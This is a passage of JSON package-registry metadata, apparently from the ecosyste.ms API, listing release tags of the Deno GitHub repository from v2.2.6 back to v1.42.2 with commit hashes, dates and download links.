.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f